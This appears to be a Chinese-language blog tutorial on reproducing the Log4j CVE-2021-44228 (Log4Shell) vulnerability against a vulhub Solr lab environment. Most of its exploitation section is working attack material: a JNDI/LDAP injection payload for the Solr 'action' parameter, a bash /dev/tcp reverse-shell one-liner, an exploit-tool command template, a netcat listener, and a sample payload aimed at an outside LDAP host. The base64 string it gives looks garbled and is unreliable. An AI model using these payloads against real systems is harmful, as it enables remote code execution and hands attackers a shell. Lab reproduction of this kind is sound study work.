当前位置: 首页 > news >正文

Log4j CVE-2021-44228 漏洞复现详细教程

1.开启环境

我们需要用到vulhub如果没有的可以自行下载一下,然后执行下列命令即可开启,然后就可以访问啦

systemctl start docker
cd /vulhub/log4j/CVE-2021-44228		//需使用绝对路径
docker-compose up -d		
docker ps //查看开启容器的端口

2.证明漏洞存在

在我们点击页面时,可以发现URL中有界面会出现/solr/admin/cores?action=的传参点,我们这验证一下是否存在漏洞,使用dnslog.cn网站生成域名在前面带上我们构造的存在JNDI的请求发过去。就可以得到回显,说明漏洞存在。

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}/*生成的域名复制到此处*/}

3.漏洞利用

下载一个JDNI方便生成我们的ldap。编写反弹shell编码,然后对其进行base64编码。根据自己前面的命令按照命令模版构造可执行命令。就可以得到下图内容。

下载地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0反弹shell代码
bash -i >& /dev/tcp/自己ip/监听端口 0>&1对反弹shell进行base64编码
YmFzaC89KKB+JiA9HJJNMDF65JHCUn1KLJAHIBBLzk5OTkgMD4mMQ==命令模版
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

我们再开一个新的终端界面开启端口监听,

nc -lvvp 监听端口		//与上面的监听端口一至

然后将我们得到的jdk 1.8 的ldap复制下来带入到下列的命令

/solr/admin/cores?action=${jndi:自己的ldap}参考:
/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/jyvecl}

将构造好的命令复制到原来的界面访问即可,回到端口监听的 终端页面就可以得到对方的shell。

http://www.lryc.cn/news/596876.html

相关文章:

  • Sklearn 机器学习 线性回归
  • 20250704-基于强化学习在云计算环境中的虚拟机资源调度研究
  • OpenCV 零基础到项目实战 | DAY 2:图像预处理全解析
  • 基于Seata的微服务分布式事务实战经验分享
  • 7月23号打卡
  • 四、cv::Mat的介绍和使用
  • 【趣味解读】淘宝登录的前后端交互机制:Cookie-Session 如何保障你的账户安全?
  • 密码学中的概率论与统计学:从频率分析到现代密码攻击
  • 从8h到40min的极致并行优化:Spark小数据集UDTF处理的深度实践与原理剖析
  • 通用图片 OCR 到 Word API 数据接口
  • AI黑科技:GAN如何生成逼真人脸
  • Jquery、Vue 、Ajax、axios、Fetch区别
  • 微算法科技(NASDAQ: MLGO)研究量子机器学习算法 (Quantum Machine Learning Algorithms),加速机器学习任务
  • 【OpenCV篇】OpenCV——02day.图像预处理(1)
  • 基于Trae IDE与MCP实现网页自动化测试的最佳实践
  • 神经网络和机器学习的一些基本概念
  • CLI 与 IDE 编码代理比较:提升开发效率的两种路径
  • PDF转Word的简单方法
  • Fluent许可与硬件绑定的解决方法
  • 2027.7.23深搜算法复习总结
  • Semantic Kernel实现调用Kernel Memory
  • 多模态Embedding技术
  • 视觉BPE统一多模态理解-北大
  • 动态路由协议基础:从原理到应用场景全解析
  • 使用LLaMA-Factory对大模型进行微调
  • 希尔排序cc
  • js面试题 高频(1-11题)
  • 初识opencv02——图像预处理1
  • 论文笔记:On the Biology of a Large Language Model
  • 如何使用内部逻辑分析仪来验证通用边缘图像处理应用程序